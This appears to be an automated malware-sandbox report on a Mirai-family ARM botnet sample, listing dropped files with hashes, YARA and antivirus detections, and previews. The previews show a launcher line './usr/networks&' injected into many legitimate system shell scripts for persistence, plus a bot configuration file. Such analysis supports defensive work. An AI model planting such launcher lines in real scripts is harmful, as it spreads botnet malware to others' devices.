                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3368
                                                                                                                                Entropy (8bit):5.3288648372922625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                                                MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                                                SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                                                SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                                                SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                                                /tmp/.config
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):284
                                                                                                                                Entropy (8bit):4.841045283359712
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NL:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuV
                                                                                                                                MD5:1AB810C9212BB8053F4F725DF471AED5
                                                                                                                                SHA1:25818035C48AD5FD30FF74125A38F7522C0B1AFA
                                                                                                                                SHA-256:20AC9D8408C78F424C045419BEC511C90ADED7E9DFCEA1D26D704D18D1BA5C6E
                                                                                                                                SHA-512:38F215233DBB733F014B31B9DBB8D40DD15AD61EDFB9F62D052F6ABD75A61A162F3298EDFAD9DC47B4DB330041E514AF5A666711FE12BEA8A2E0B5C1DCABC055
                                                                                                                                Malicious:false
                                                                                                                                Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                                                                                /usr/bin/gettext.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1914
                                                                                                                                Entropy (8bit):4.829445473341419
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                                                MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                                                SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                                                SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                                                SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                                                /usr/networks
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):307960
                                                                                                                                Entropy (8bit):5.819679405566689
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                                MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                                SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                                SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                                SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                                                • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                                                • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                                                /usr/sbin/alsa-info.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25983
                                                                                                                                Entropy (8bit):5.455683610707543
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                                                MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                                                SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                                                SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                                                SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                                                /usr/share/alsa-base/alsa-info.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25464
                                                                                                                                Entropy (8bit):5.453877096685684
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                                                MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                                                SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                                                SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                                                SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                                                /usr/share/alsa/utils.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4725
                                                                                                                                Entropy (8bit):5.44928341819888
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                                                MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                                                SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                                                SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                                                SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                                                /usr/share/brltty/initramfs/brltty.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46
                                                                                                                                Entropy (8bit):3.925523369006428
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                                MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                                SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                                SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                                SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                                /usr/share/cups/braille/cups-braille.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:UTF-8 Unicode text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3551
                                                                                                                                Entropy (8bit):5.478748088887141
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                                                MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                                                SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                                                SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                                                SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                                                /usr/share/cups/braille/index.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):590
                                                                                                                                Entropy (8bit):5.080350031939274
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                                                MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                                                SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                                                SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                                                SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                                                /usr/share/cups/braille/indexv3.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):945
                                                                                                                                Entropy (8bit):4.9071581716168575
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                                                MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                                                SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                                                SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                                                SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/cups/braille/indexv4.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):818
                                                                                                                                Entropy (8bit):4.8178661177968065
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                                                MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                                                SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                                                SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                                                SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/debconf/confmodule.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/acpid/examples/ac.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/acpid/examples/default.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):309
                                                                                                                                Entropy (8bit):4.972882784760757
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                                                MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                                                SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                                                SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                                                SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3647
                                                                                                                                Entropy (8bit):4.544491450799858
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                                                MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                                                SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                                                SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                                                SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                                                /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:awk or perl script, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1829
                                                                                                                                Entropy (8bit):4.38604786798686
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                                                MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                                                SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
